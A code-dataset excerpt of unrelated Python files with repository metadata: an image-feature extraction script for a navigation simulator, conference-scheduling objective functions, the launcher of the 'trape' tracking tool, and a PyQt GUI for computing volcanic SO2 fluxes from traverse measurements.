parser.add_argument(
"--model",
type=str,
default="ResNet-152",
choices=[
"ResNet-152",
"BiT-M-R50x1",
"BiT-M-R50x3",
"BiT-M-R50x1",
"BiT-M-R101x1",
"BiT-M-R101x3",
"BiT-M-R152x4",
"BiT-S-R50x1",
"BiT-S-R50x3",
"BiT-S-R101x1",
"BiT-S-R101x3",
"BiT-S-R152x4",
],
)
parser.add_argument("--img-features-dir", type=str, default="srv/img_features")
parser.add_argument("--models-dir", type=str, default="models/")
parser.add_argument("--output-feature-file", type=str, default="")
parser.add_argument("--seed", type=int, default=1, help="")
parser.add_argument("--batch-size", type=int, default=12, help="")
args = parser.parse_args()
FEATURE_SIZES = {
"ResNet-152": 2048,
"BiT-M-R50x1": 2048,
"BiT-M-R50x3": 6144,
"BiT-M-R101x1": 2048,
"BiT-M-R101x3": 6144,
"BiT-M-R152x4": 8192,
"BiT-S-R50x1": 2048,
"BiT-S-R50x3": 6144,
"BiT-S-R101x1": 2048,
"BiT-S-R101x3": 6144,
"BiT-S-R152x4": 8192,
}
NUM_GPUS = 1
MODEL_NAME = args.model
FEATURE_SIZE = FEATURE_SIZES[MODEL_NAME]
BATCH_SIZE = (
args.batch_size
) # Some fraction of viewpoint size - batch size 4 equals 11GB memory
if args.output_feature_file == "":
OUTFILE = "%s-imagenet-pytorch.tsv" % MODEL_NAME
else:
OUTFILE = args.output_feature_file
OUTFILE = os.path.join(args.img_features_dir, OUTFILE)
MERGED = OUTFILE
if NUM_GPUS != 1:
OUTFILE = OUTFILE + ".%d"
MODELS = args.models_dir
GRAPHS = "connectivity/"
SEED = args.seed
print("SEED: %d" % SEED)
# --------------------------------------------
# --------------------------------------------
TSV_FIELDNAMES = ["scanId", "viewpointId", "image_w", "image_h", "vfov", "features"]
VIEWPOINT_SIZE = 36 # Number of discretized views from one viewpoint
GPU_ID = 0
# Simulator image parameters
WIDTH = 640
HEIGHT = 480
VFOV = 60
random.seed(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
torch.cuda.manual_seed(SEED)
def load_model(model_name):
if model_name == "ResNet-152":
resnet_full = torchvision.models.resnet152(pretrained=True)
resnet = nn.Sequential(*list(resnet_full.children())[:-1])
return resnet
elif "BiT" in model_name: # BiT-M-R50x1
model = bit_models.KNOWN_MODELS[model_name](head_size=1000, zero_head=True)
model.load_from(np.load(MODELS + model_name + ".npz"))
all_layers = list(model.children())
main_stack = all_layers[:-1]
last_layer_wihout_fc = all_layers[-1][:-1]
model_without_fc = main_stack + [last_layer_wihout_fc]
bit = nn.Sequential(*model_without_fc)
return bit
def load_viewpointids(job_id=0):
viewpointIds = []
with open(GRAPHS + "scans.txt") as f:
scans = [scan.strip() for scan in f.readlines()]
for scan in scans:
with open(GRAPHS + scan + "_connectivity.json") as j:
data = json.load(j)
for item in data:
if item["included"]:
viewpointIds.append((scan, item["image_id"]))
random.seed(SEED)
random.shuffle(viewpointIds)
if NUM_GPUS != 1:
viewpointIds = viewpointIds[job_id::NUM_GPUS]
print("%d: Loaded %d viewpoints" % (job_id, len(viewpointIds)))
return viewpointIds
def transform_img_resnet(im):
""" Prep opencv 3 channel image for the network """
np_im = np.array(im, copy=True).astype(np.float32)
np_im = np_im[..., ::-1]
np_im = np_im.transpose((2, 0, 1)) # (3, H, W)
np_im = np.ascontiguousarray(np_im, dtype=np.float32)
im = torch.from_numpy(np_im)
im /= 255.0
return F.normalize(im, mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
def transform_img_bit(im):
np_im = np.array(im, copy=True).astype(np.float32)
np_im = np_im[..., ::-1]
np_im = np_im.transpose((2, 0, 1)) # (3, H, W)
np_im = np.ascontiguousarray(np_im, dtype=np.float32)
im = torch.from_numpy(np_im)
im /= 255.0
return F.normalize(im, mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5])
def build_tsv(ids):
job_id = ids[0]
gpu_id = ids[1]
print("JOB ID %d GPU ID %d: build_tsv" % (job_id, gpu_id))
# Set up the simulator
sim = MatterSim.Simulator()
sim.setCameraResolution(WIDTH, HEIGHT)
sim.setCameraVFOV(math.radians(VFOV))
sim.setDiscretizedViewingAngles(True)
sim.setBatchSize(1)
sim.initialize()
with torch.no_grad():
device = torch.device("cuda:%d" % gpu_id)
model = load_model(MODEL_NAME).to(device)
model.eval()
count = 0
t_render = Timer()
t_net = Timer()
if NUM_GPUS == 1:
output_file = OUTFILE
else:
output_file = OUTFILE % job_id
with open(output_file, "wt") as tsvfile:
writer = csv.DictWriter(tsvfile, delimiter="\t", fieldnames=TSV_FIELDNAMES)
# Loop all the viewpoints in the simulator
viewpointIds = load_viewpointids(job_id)
for scanId, viewpointId in viewpointIds:
t_render.tic()
# Loop all discretized views from this location
blobs = []
features = np.empty([VIEWPOINT_SIZE, FEATURE_SIZE], dtype=np.float32)
for ix in range(VIEWPOINT_SIZE):
if ix == 0:
sim.newEpisode(
[scanId], [viewpointId], [0], [math.radians(-30)]
)
elif ix % 12 == 0:
sim.makeAction([0], [1.0], [1.0])
else:
sim.makeAction([0], [1.0], [0])
state = sim.getState()[0]
assert state.viewIndex == ix
# Transform and save generated image
if "ResNet" in MODEL_NAME:
transformed_im = transform_img_resnet(state.rgb)
elif "BiT" in MODEL_NAME:
transformed_im = transform_img_bit(state.rgb)
blobs.append(transformed_im)
t_render.toc()
t_net.tic()
# Run as many forward passes as necessary
assert VIEWPOINT_SIZE % BATCH_SIZE == 0
forward_passes = VIEWPOINT_SIZE // BATCH_SIZE
ix = 0
data = torch.empty(
(BATCH_SIZE, 3, HEIGHT, WIDTH), dtype=torch.float32, device=device
)
for f in range(forward_passes):
for n in range(BATCH_SIZE):
# Copy image blob to the net
data[n, :, :, :] = blobs[ix]
ix += 1
# Forward pass
features[f * BATCH_SIZE : (f + 1) * BATCH_SIZE, :] = (
model(data).squeeze().cpu().detach().numpy()
)
writer.writerow(
{
"scanId": scanId,
"viewpointId": viewpointId,
"image_w": WIDTH,
"image_h": HEIGHT,
"vfov": VFOV,
"features": str(base64.b64encode(features), "utf-8"),
}
)
count += 1
t_net.toc()
if count % 100 == 0:
print(
"Processed %d / %d viewpoints, %.1fs avg render time, %.1fs avg net time, projected %.1f hours"
% (
count,
len(viewpointIds),
t_render.average_time,
t_net.average_time,
(t_render.average_time + t_net.average_time)
* len(viewpointIds)
/ 3600,
)
)
def merge_tsvs():
test = [OUTFILE % i for i in range(NUM_GPUS)]
with open(MERGED, "wt") as tsvfile:
writer = csv.DictWriter(tsvfile, delimiter="\t", fieldnames=TSV_FIELDNAMES)
for infile in test:
print(infile)
with open(infile, "rt") as tsv_in_files:
reader = csv.DictReader(
tsv_in_files, delimiter="\t", fieldnames=TSV_FIELDNAMES
)
for item in reader:
try:
writer.writerow(item)
except Exception as e:
print(e)
print(item["image_id"])
def read_tsv(infile):
# Verify we can read a tsv
in_data = []
with open(infile, "rt") as tsv_in_file:
reader = csv.DictReader(tsv_in_file, delimiter="\t", fieldnames=TSV_FIELDNAMES)
for item in reader:
item["scanId"] = item["scanId"]
item["image_h"] = int(item["image_h"])
item["image_w"] = int(item["image_w"])
item["vfov"] = int(item["vfov"])
item["features"] = np.frombuffer(
base64.b64decode(item["features"]), dtype=np.float32
).reshape((VIEWPOINT_SIZE, FEATURE_SIZE))
in_data.append(item)
return in_data
if __name__ == "__main__":
if NUM_GPUS == 1:
build_tsv()
data = read_tsv(OUTFILE)
print("Completed %d viewpoints" % len(data))
else:
# JOB, GPU
ids = [[0, 0], [1, 1], [2, 2], [3, 3]]
p = Pool(4)
p.map(build_tsv, ids)
merge_tsvs()
data = read_tsv(MERGED)
print("Completed %d viewpoints" % len(data))
| 30.925373
| 119
| 0.542278
|
acff5d90d533c828fc0684b7c5eb31fe2cc1544d
| 1,287
|
py
|
Python
|
src/conference_scheduler/lp_problem/objective_functions.py
|
ChahalMandeep/ConferenceScheduler
|
e5a0eff8796ba5711b5c3b591ff4b9a2e0f61a04
|
[
"MIT"
] | 46
|
2017-04-30T17:37:38.000Z
|
2022-03-29T12:52:38.000Z
|
src/conference_scheduler/lp_problem/objective_functions.py
|
ChahalMandeep/ConferenceScheduler
|
e5a0eff8796ba5711b5c3b591ff4b9a2e0f61a04
|
[
"MIT"
] | 95
|
2017-05-01T16:30:04.000Z
|
2018-11-07T10:48:50.000Z
|
src/conference_scheduler/lp_problem/objective_functions.py
|
ChahalMandeep/ConferenceScheduler
|
e5a0eff8796ba5711b5c3b591ff4b9a2e0f61a04
|
[
"MIT"
] | 11
|
2017-05-01T16:17:46.000Z
|
2022-03-29T12:52:41.000Z
|
from conference_scheduler.converter import schedule_to_array
def efficiency_capacity_demand_difference(slots, events, X, **kwargs):
"""
A function that calculates the total difference between demand for an event
and the slot capacity it is scheduled in.
"""
overflow = 0
for row, event in enumerate(events):
for col, slot in enumerate(slots):
overflow += (event.demand - slot.capacity) * X[row, col]
return overflow
def equity_capacity_demand_difference(slots, events, X, beta, **kwargs):
"""
A function that returns the maximum difference between demand for an event
and the slot capacity it is scheduled in.
"""
return beta
def number_of_changes(slots, events, original_schedule, X, **kwargs):
"""
A function that counts the number of changes between a given schedule
and an array (either numpy array of lp array).
"""
changes = 0
original_array = schedule_to_array(original_schedule, events=events,
slots=slots)
for row, event in enumerate(original_array):
for col, slot in enumerate(event):
if slot == 0:
changes += X[row, col]
else:
changes += 1 - X[row, col]
return changes
| 34.783784
| 79
| 0.645688
|
acff5e8e539c1f6e03a9da1d188d743aa926b75c
| 1,375
|
py
|
Python
|
trape.py
|
xmi666/trape
|
4f56fbb3f88bcf8d9ceff1f2e32b300bd58b43c4
|
[
"CC-BY-3.0",
"MIT"
] | 1
|
2021-11-28T00:03:42.000Z
|
2021-11-28T00:03:42.000Z
|
trape.py
|
xmi666/trape
|
4f56fbb3f88bcf8d9ceff1f2e32b300bd58b43c4
|
[
"CC-BY-3.0",
"MIT"
] | 3
|
2021-05-19T13:18:52.000Z
|
2021-06-12T18:15:34.000Z
|
trape.py
|
xmi666/trape
|
4f56fbb3f88bcf8d9ceff1f2e32b300bd58b43c4
|
[
"CC-BY-3.0",
"MIT"
] | 1
|
2022-02-03T23:37:03.000Z
|
2022-02-03T23:37:03.000Z
|
#!/usr/bin/env python3.8
# -*- coding: utf-8 -*-
# **
#
##########################################
# Trape | People tracker on the Internet #
##########################################
#
# Learn to track the world, to avoid being traced
#
# @version 2.1
# @link https://github.com/jofpin/trape
# @author Jose Pino (@jofpin)
# @copyright 2018 by Jose Pino / <jofpin@gmail.com>
#
# This file is the boot in Trape.
# For full copyright information this visit: https://github.com/jofpin/trape
#
# **
#
###############################################
from flask_socketio import SocketIO
from core.utils import utils #
from core import trape, db, app
try:
import flask
import flask_socketio
import os
except:
utils.Go("\t\nPlease install requirements.txt libraries, you can do it executing:")
utils.Go("\t\npip install -r requirements.txt")
if __name__ == "__main__":
trape.load_config()
trape.process_arguments()
if db.firstTime:
db.create_database()
utils.first_time_message()
trape.header()
import core.user
import core.stats
from core.sockets import Sockets
socketio = SocketIO(app)
socketio.on_namespace(Sockets('/trape'))
try:
socketio.run(app, host='0.0.0.0', port=trape.app_port, debug=False)
except KeyboardInterrupt:
socketio.stop()
exit(0)
| 24.553571
| 87
| 0.599273
|
acff5ecbd1742b53ac097a19fb8c347c800d35e7
| 74,435
|
py
|
Python
|
ifit/gui_tools.py
|
benjaminesse/iFit
|
f9450c0740c68038c5bd1682d700428185cafb4a
|
[
"MIT"
] | 3
|
2019-06-28T00:48:20.000Z
|
2021-02-22T07:30:29.000Z
|
ifit/gui_tools.py
|
benjaminesse/iFit
|
f9450c0740c68038c5bd1682d700428185cafb4a
|
[
"MIT"
] | null | null | null |
ifit/gui_tools.py
|
benjaminesse/iFit
|
f9450c0740c68038c5bd1682d700428185cafb4a
|
[
"MIT"
] | null | null | null |
"""Contains scripts to launch GUI tools.
These functions laucnch new windows for tasks outside the standard GUI,
including:
- Calculate light dilution
- Characterise the flat spectrum and instrument line shape
- Measure fluxes from traverse measurements
"""
import os
import sys
import yaml
import logging
import traceback
import numpy as np
import pandas as pd
import pyqtgraph as pg
from functools import partial
from scipy.optimize import curve_fit
from scipy.interpolate import griddata
from PyQt5.QtGui import QIcon, QPalette, QColor
from PyQt5.QtCore import Qt, QThreadPool, QObject, pyqtSignal, QThread
from PyQt5.QtWidgets import (QMainWindow, QWidget, QApplication, QGridLayout,
QLabel, QTextEdit, QLineEdit, QPushButton, QFrame,
QFileDialog, QScrollArea, QCheckBox, QSplitter,
QComboBox, QDoubleSpinBox, QTableWidget,
QTableWidgetItem, QTabWidget, QMessageBox)
from ifit.gui_functions import QTextEditLogger, DSpinBox, Widgets
from ifit.parameters import Parameters
from ifit.spectral_analysis import Analyser
from ifit.load_spectra import average_spectra
from ifit.light_dilution import generate_ld_curves
try:
from .make_ils import super_gaussian
from .haversine import haversine
except ImportError:
from make_ils import super_gaussian
from haversine import haversine
COLORS = ['#1f77b4', '#ff7f0e', '#2ca02c', '#d62728', '#9467bd', '#8c564b',
'#e377c2', '#7f7f7f', '#bcbd22', '#17becf']
logger = logging.getLogger(__name__)
# =============================================================================
# Calculate Flux
# =============================================================================
class CalcFlux(QMainWindow):
"""Open a window for flux analysis."""
def __init__(self, parent=None):
"""Initialise the window."""
super(CalcFlux, self).__init__(parent)
# Set the window properties
self.setWindowTitle('Calculate Flux')
self.statusBar().showMessage('Ready')
self.setGeometry(40, 40, 1000, 500)
self.setWindowIcon(QIcon('bin/icons/flux.png'))
# Set the window layout
self.generalLayout = QGridLayout()
self._centralWidget = QScrollArea()
self.widget = QWidget()
self.setCentralWidget(self._centralWidget)
self.widget.setLayout(self.generalLayout)
# Scroll Area Properties
self._centralWidget.setWidgetResizable(True)
self._centralWidget.setWidget(self.widget)
self.save_flag = False
self.widgets = Widgets()
self._createApp()
self.load_config()
def _createApp(self):
"""Create the app widgets."""
# Create a frame to hold program controls
self.controlFrame = QFrame(self)
self.controlFrame.setFrameShape(QFrame.StyledPanel)
# Create a frame to hold volcano data
self.volcanoFrame = QFrame(self)
self.volcanoFrame.setFrameShape(QFrame.StyledPanel)
# Create a frame to hold program outputs
self.outputFrame = QFrame(self)
self.outputFrame.setFrameShape(QFrame.StyledPanel)
# Create a frame to hold graphs
self.graphFrame = QFrame(self)
self.graphFrame.setFrameShape(QFrame.StyledPanel)
# Add splitters to allow for adjustment
splitter1 = QSplitter(Qt.Vertical)
splitter1.addWidget(self.controlFrame)
splitter1.addWidget(self.volcanoFrame)
splitter1.addWidget(self.outputFrame)
splitter2 = QSplitter(Qt.Horizontal)
splitter2.addWidget(splitter1)
splitter2.addWidget(self.graphFrame)
# Pack the Frames and splitters
self.generalLayout.addWidget(splitter2)
self._createControls()
self._createVolcano()
self._createOutput()
self._createGraphs()
# =============================================================================
# Program Controls
# =============================================================================
def _createControls(self):
"""Build the main GUI controls."""
# Generate main layout
layout = QGridLayout(self.controlFrame)
# Create input for iFit output
layout.addWidget(QLabel('iFit File:'), 0, 0)
self.widgets['so2_path'] = QLineEdit()
self.widgets['so2_path'].setFixedSize(200, 25)
layout.addWidget(self.widgets['so2_path'], 0, 1)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.widgets['so2_path'],
'single', "Comma Separated (*.csv)"))
layout.addWidget(btn, 0, 2)
# Add checkbox to remove bad fits
self.widgets['despike_flag'] = QCheckBox('Remove\nBad fits?')
layout.addWidget(self.widgets['despike_flag'], 0, 3)
# Create input for GPS intput
layout.addWidget(QLabel('GPS File:'), 1, 0)
self.widgets['gps_path'] = QLineEdit()
self.widgets['gps_path'].setFixedSize(200, 25)
layout.addWidget(self.widgets['gps_path'], 1, 1)
gps_btn = QPushButton('Browse')
gps_btn.setFixedSize(70, 25)
gps_btn.clicked.connect(partial(browse, self, self.widgets['gps_path'],
'single', "GPS File (*.txt)"))
layout.addWidget(gps_btn, 1, 2)
# Add checkbox to remove bad fits
def gps_toggle():
state = self.widgets['gps_file_flag'].isChecked()
self.widgets['gps_path'].setReadOnly(state)
gps_btn.setEnabled(state)
self.widgets['gps_file_flag'] = QCheckBox('Use Separate\nGPS File?')
self.widgets['gps_file_flag'].stateChanged.connect(gps_toggle)
layout.addWidget(self.widgets['gps_file_flag'], 1, 3)
gps_toggle()
# Create inputs for the time difference
layout.addWidget(QLabel('GPS Time\nDifference:'), 2, 0)
self.widgets['tdiff'] = QDoubleSpinBox()
self.widgets['tdiff'].setRange(-24, 24)
self.widgets['tdiff'].setValue(0.0)
layout.addWidget(self.widgets['tdiff'], 2, 1)
# Make a button to read in the data
btn = QPushButton('Import')
btn.setFixedSize(100, 25)
btn.clicked.connect(self.import_data)
layout.addWidget(btn, 3, 3)
# Create input for output
layout.addWidget(QLabel('Output\nFolder:'), 3, 0)
self.widgets['out_path'] = QLineEdit()
self.widgets['out_path'].setFixedSize(200, 25)
layout.addWidget(self.widgets['out_path'], 3, 1)
btn = QPushButton('Browse')
btn.setFixedSize(70, 25)
btn.clicked.connect(partial(browse, self, self.widgets['out_path'],
'folder'))
layout.addWidget(btn, 3, 2)
# =============================================================================
# Volcano Data
# =============================================================================
def _createVolcano(self):
"""Create the volcano data inputs."""
# Load volcano data
self.volcano_data = {}
if os.path.isfile('bin/volcano_data.yml'):
with open('bin/volcano_data.yml', 'r') as ymlfile:
self.volcano_data = yaml.load(ymlfile, Loader=yaml.FullLoader)
# Create the layout
layout = QGridLayout(self.volcanoFrame)
# Create a combobox to hold the pre-saved volcano data
layout.addWidget(QLabel('Volcano:'), 0, 0)
self.widgets['volcano'] = QComboBox()
self.widgets['volcano'].addItems(
['--select--'] + list(self.volcano_data.keys()))
self.widgets['volcano'].currentIndexChanged.connect(
self.update_volcano_data)
layout.addWidget(self.widgets['volcano'], 0, 1)
# Create inputs for the volcano latitude
layout.addWidget(QLabel('Volcano\nLatitude:'), 1, 0)
self.vlat = QLineEdit()
self.vlat.textChanged.connect(self._on_volcano_change)
layout.addWidget(self.vlat, 1, 1)
# Create inputs for the volcano longitude
layout.addWidget(QLabel('Volcano\nLongitutde:'), 2, 0)
self.vlon = QLineEdit()
self.vlon.textChanged.connect(self._on_volcano_change)
layout.addWidget(self.vlon, 2, 1)
# Create inputs for the wind speed
layout.addWidget(QLabel('Wind\nSpeed:'), 1, 2)
self.widgets['wind_speed'] = QDoubleSpinBox()
self.widgets['wind_speed'].setRange(0, 100)
self.widgets['wind_speed'].setValue(1.0)
layout.addWidget(self.widgets['wind_speed'], 1, 3)
# Create input for wind units
self.widgets['wind_units'] = QComboBox()
self.widgets['wind_units'].addItems(['m/s', 'knots'])
layout.addWidget(self.widgets['wind_units'], 1, 4)
# Create inputs for the wind speed
layout.addWidget(QLabel('Wind\nError:'), 2, 2)
self.widgets['wind_error'] = QDoubleSpinBox()
self.widgets['wind_error'].setRange(0, 1000)
layout.addWidget(self.widgets['wind_error'], 2, 3)
# Create input for wind units
self.widgets['err_units'] = QComboBox()
self.widgets['err_units'].addItems(['%', 'abs'])
layout.addWidget(self.widgets['err_units'], 2, 4)
# =============================================================================
# Create outputs
# =============================================================================
def _createOutput(self):
"""Create the program outputs."""
# Generate the layout
layout = QGridLayout(self.outputFrame)
# Add a button to calculate the flux
calc_btn = QPushButton('Calculate Flux')
calc_btn.setFixedSize(90, 25)
calc_btn.clicked.connect(self.calc_flux)
layout.addWidget(calc_btn, 0, 0)
# Add a button to remove the last flux
rem_btn = QPushButton('Remove Last')
rem_btn.setFixedSize(90, 25)
rem_btn.clicked.connect(self.del_trav)
layout.addWidget(rem_btn, 0, 1)
# Add a button to save the fluxes
sav_btn = QPushButton('Save Fluxes')
sav_btn.setFixedSize(90, 25)
sav_btn.clicked.connect(self.save_fluxes)
layout.addWidget(sav_btn, 0, 2)
# Create a combobox to hold the pre-saved volcano data
label = QLabel('Flux\nUnits:')
label.setAlignment(Qt.AlignRight)
layout.addWidget(label, 0, 3)
self.widgets['flux_units'] = QComboBox()
self.widgets['flux_units'].addItems(['kg/s', 't/day'])
layout.addWidget(self.widgets['flux_units'], 0, 4)
# Add a table to hold the flux results
self.fluxTable = QTableWidget()
self.fluxTable.setColumnCount(2)
self.fluxTable.setRowCount(0)
self.fluxTable.setHorizontalHeaderLabels(['Flux', 'Error'])
layout.addWidget(self.fluxTable, 1, 0, 1, 5)
# Create a textbox to display the program messages
self.logBox = QTextEditLogger(self)
self.logBox.setFormatter(logging.Formatter('%(message)s'))
logging.getLogger().addHandler(self.logBox)
logging.getLogger().setLevel(logging.INFO)
layout.addWidget(self.logBox.widget, 2, 0, 1, 5)
# =============================================================================
# Graphs
# =============================================================================
def _createGraphs(self):
    """Generate the graphs.

    Builds two tabs: a traverse plot of SO2 SCD against time/number and
    a map of the traverse track. The plot items are stored in
    self.ax_elements / self.map_elements for later updating.
    """
    layout = QGridLayout(self.graphFrame)
    pg.setConfigOptions(antialias=True)
    # Generate tabs for the graphs and settings
    tab1 = QWidget()
    tab2 = QWidget()
    # Form the tab widget
    tabwidget = QTabWidget()
    tabwidget.addTab(tab1, 'Traverse')
    tabwidget.addTab(tab2, 'Map')
    layout.addWidget(tabwidget, 0, 0)
    g1layout = QGridLayout(tab1)
    graphwin = pg.GraphicsLayoutWidget(show=True)
    # Make the traverse graph
    self.ax = graphwin.addPlot()
    self.ax.setDownsampling(mode='peak')
    self.ax.setClipToView(True)
    self.ax.showGrid(x=True, y=True)
    # Add axis labels
    self.ax.setLabel('left', 'SO<sub>2</sub> SCD (molec cm<sup>-2</sup>)')
    self.ax.setLabel('bottom', 'Time')
    # Add the plot elements: a shaded error envelope between l1 and l2
    b0 = QColor('#1f77b4')
    b0.setAlpha(120)
    l1 = pg.PlotCurveItem(pen=None)
    l2 = pg.PlotCurveItem(pen=None)
    pfill = pg.FillBetweenItem(l1, l2, pen=None, brush=b0)
    self.ax.addItem(pfill)
    line = pg.PlotCurveItem(pen=pg.mkPen(COLORS[0], width=2))
    sline = pg.PlotCurveItem(pen=pg.mkPen(COLORS[2], width=2))
    # Add the region selector used to pick out a single traverse
    region_select = pg.LinearRegionItem()
    region_select.setZValue(-1)
    region_select.sigRegionChangeFinished.connect(self._on_region_change)
    # Add the (movable) baseline
    baseline = pg.InfiniteLine(0, angle=0, movable=True)
    self.ax_elements = {'line': line, 'sline': sline, 'hi_err': l1,
                        'lo_err': l2, 'region_select': region_select,
                        'baseline': baseline}
    for el in self.ax_elements.values():
        self.ax.addItem(el)
    # Add the graphs to the layout
    g1layout.addWidget(graphwin, 0, 0, 0, 5)
    # Create a combobox to determine x axis as time or number
    self.widgets['x_axis'] = QComboBox()
    self.widgets['x_axis'].addItems(['Time', 'Number'])
    self.widgets['x_axis'].currentIndexChanged.connect(self.switch_x_axis)
    g1layout.addWidget(self.widgets['x_axis'], 1, 2)
    g2layout = QGridLayout(tab2)
    graphwin = pg.GraphicsLayoutWidget(show=True)
    # Make the map
    self.mapax = graphwin.addPlot()
    self.mapax.setDownsampling(mode='peak')
    self.mapax.setClipToView(True)
    self.mapax.showGrid(x=True, y=True)
    self.mapax.setAspectLocked(True)
    self.mapax.addLegend()
    # Add plot elements
    full_trav_line = pg.PlotCurveItem(pen=pg.mkPen(COLORS[0], width=2))
    trav_scat = pg.ScatterPlotItem()
    trav_scat.setZValue(-1)
    trav_line = pg.PlotCurveItem(pen=pg.mkPen(COLORS[2], width=2))
    volcano = pg.ScatterPlotItem(symbol='o', size=10, name='Volcano',
                                 brush=pg.mkBrush(color='r'))
    # NOTE: plume_stop marks the traverse END and plume_cent the plume
    # CENTRE (see _on_region_change / calc_flux); the legend names were
    # previously swapped
    plume_start = pg.ScatterPlotItem(
        symbol='t1', pen=pg.mkPen(color='w'), size=10,
        brush=pg.mkBrush(color=COLORS[2]), name='Plume Start')
    plume_stop = pg.ScatterPlotItem(
        symbol='t', pen=pg.mkPen(color='w'), size=10,
        brush=pg.mkBrush(color=COLORS[2]), name='Plume End')
    plume_cent = pg.ScatterPlotItem(
        symbol='o', pen=pg.mkPen(color='w'), size=10,
        brush=pg.mkBrush(color=COLORS[2]), name='Plume Centre')
    self.map_elements = {'full_trav_line': full_trav_line,
                         'trav_line': trav_line,
                         'trav_scat': trav_scat,
                         'plume_start': plume_start,
                         'plume_stop': plume_stop,
                         'plume_cent': plume_cent,
                         'volcano': volcano}
    for el in self.map_elements.values():
        self.mapax.addItem(el)
    # Add axis labels
    self.mapax.setLabel('left', 'Latitude')
    self.mapax.setLabel('bottom', 'Longitude')
    # Generate the colormap used to colour the track by SO2 column
    self.cm = pg.colormap.get('magma', source='matplotlib')
    # Make pens for plotting
    self.p0 = pg.mkPen(color='#1f77b4', width=1.5)
    self.p1 = pg.mkPen(color='#ff7f0e', width=2.0)
    self.b0 = QColor('#1f77b4')
    self.b0.setAlpha(120)
    # Add the graphs to the layout
    g2layout.addWidget(graphwin, 0, 0, 0, 0)
# =============================================================================
# Update Volcano Data
# =============================================================================
def update_volcano_data(self):
    """Update the volcano data on combobox change."""
    selected = str(self.widgets.get('volcano'))
    # Ignore the placeholder entry
    if selected == '--select--':
        return
    # Copy the stored lat/lon into the location entries
    entry = self.volcano_data[selected]
    self.vlat.setText(str(entry[0]))
    self.vlon.setText(str(entry[1]))
# =============================================================================
# Slot functions
# =============================================================================
def _on_region_change(self):
    """Highlight the selected traverse when the region selector moves."""
    try:
        # Bounds of the highlighted region
        lo, hi = self.ax_elements['region_select'].getRegion()
        # Select points inside the region on the active x-axis
        if self.widgets.get('x_axis') == 'Time':
            xdata = self.so2_time
        else:
            xdata = self.so2_num
        idx = np.where(np.logical_and(xdata >= lo, xdata <= hi))
        # Slice out the selected traverse
        plotx = xdata[idx]
        ploty = self.so2_scd[idx] / 10**self.order
        lat = self.lat[idx]
        lon = self.lon[idx]
        # Highlight the selection on the time series...
        self.ax_elements['sline'].setData(plotx, ploty)
        # ...and on the map, marking the traverse start and end
        self.map_elements['trav_line'].setData(lon, lat)
        self.map_elements['plume_start'].setData([lon[0]], [lat[0]])
        self.map_elements['plume_stop'].setData([lon[-1]], [lat[-1]])
    except AttributeError:
        # No traverse data imported yet
        pass
def _on_volcano_change(self):
    """Move the volcano marker when the location entries change."""
    try:
        latitude = float(self.vlat.text())
        longitude = float(self.vlon.text())
        self.map_elements['volcano'].setData([longitude], [latitude])
    except ValueError:
        # Ignore incomplete/invalid text while the user is typing
        pass
# =============================================================================
# Import data
# =============================================================================
def import_data(self):
    """Import the traverse data.

    Reads the iFit SO2 results (and optionally a separate GPS file),
    interpolates the GPS track onto the spectra times, resets the
    traverse plot and map, and clears any previous flux results.
    Prompts to save outstanding fluxes first.
    """
    logger.info('Importing traverse data...')
    # Ask to save any outstanding fluxes
    if self.save_flag:
        options = QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel
        reply = QMessageBox.question(self, 'Message',
                                     "Would you like to save the fluxes?",
                                     options, QMessageBox.Cancel)
        if reply == QMessageBox.Yes:
            self.save_fluxes()
        elif reply == QMessageBox.No:
            pass
        else:
            return
    # Read in the SO2 results
    logger.info('Importing gas data...')
    so2_df = pd.read_csv(self.widgets.get('so2_path'),
                         parse_dates=['Time'], comment='#')
    # Convert timestamps to decimal hours
    self.so2_time = np.array([t.hour + t.minute/60 + t.second/3600
                              for t in so2_df['Time']])
    self.so2_num = so2_df['Number'].to_numpy()
    self.so2_scd = so2_df['SO2'].to_numpy()
    self.so2_err = so2_df['SO2_err'].to_numpy()
    # Optionally mask out poor quality fits
    if self.widgets['despike_flag'].isChecked():
        try:
            mask = so2_df['fit_quality'] != 1
            self.so2_scd = np.ma.masked_where(mask, self.so2_scd)
            self.so2_err = np.ma.masked_where(mask, self.so2_err)
        except KeyError:
            logger.warning('Fit quality not found in iFit file!')
    if self.widgets['gps_file_flag'].isChecked():
        # Read in the GPS data
        logger.info('Importing GPS data...')
        gps_df = pd.read_table(self.widgets.get('gps_path'), sep='\t',
                               parse_dates=['time'])
        lat = gps_df['latitude'].to_numpy()
        lon = gps_df['longitude'].to_numpy()
        # Correct the GPS time for the time difference
        tdiff = float(self.widgets.get('tdiff'))
        gps_time = np.array([t.hour + t.minute/60 + t.second/3600 + tdiff
                             for t in gps_df['time']])
        # Interpolate the GPS locations onto the spectra times
        self.lat = griddata(gps_time, lat, self.so2_time)
        self.lon = griddata(gps_time, lon, self.so2_time)
    else:
        # Pull from the iFit results file
        self.lat = so2_df['Lat'].to_numpy()
        self.lon = so2_df['Lon'].to_numpy()
    # Determine the display scaling. Reset the order to zero first so
    # that (a) it is always defined for the error bars below and (b) a
    # stale scaling from a previously imported dataset is not reused
    self.order = 0
    ploty = self.so2_scd
    if np.nanmax(self.so2_scd) > 1e6:
        self.order = int(np.ceil(np.log10(np.nanmax(ploty)))) - 1
        ploty = ploty / 10**self.order
    plot_err = [ploty - self.so2_err/10**self.order,
                ploty + self.so2_err/10**self.order]
    self.ax.setLabel('left', f'SO2 SCD (1e{self.order})')
    if self.widgets.get('x_axis') == 'Time':
        plotx = self.so2_time
    else:
        plotx = self.so2_num
    # Update graph
    self.ax_elements['line'].setData(plotx, ploty)
    self.ax_elements['hi_err'].setData(plotx, plot_err[0])
    self.ax_elements['lo_err'].setData(plotx, plot_err[1])
    self.ax_elements['region_select'].setRegion([plotx[0], plotx[-1]])
    self.ax_elements['baseline'].setValue(0)
    # Update map, colouring the track by the normalised SO2 column
    norm = (ploty-np.nanmin(ploty)) / np.nanmax(ploty-np.nanmin(ploty))
    pens = [pg.mkPen(color=self.cm.map(val)) for val in norm]
    brushes = [pg.mkBrush(color=self.cm.map(val))
               for val in norm]
    self.map_elements['trav_scat'].setData(
        x=self.lon, y=self.lat, pen=pens, brush=brushes)
    self.map_elements['full_trav_line'].setData(x=self.lon, y=self.lat)
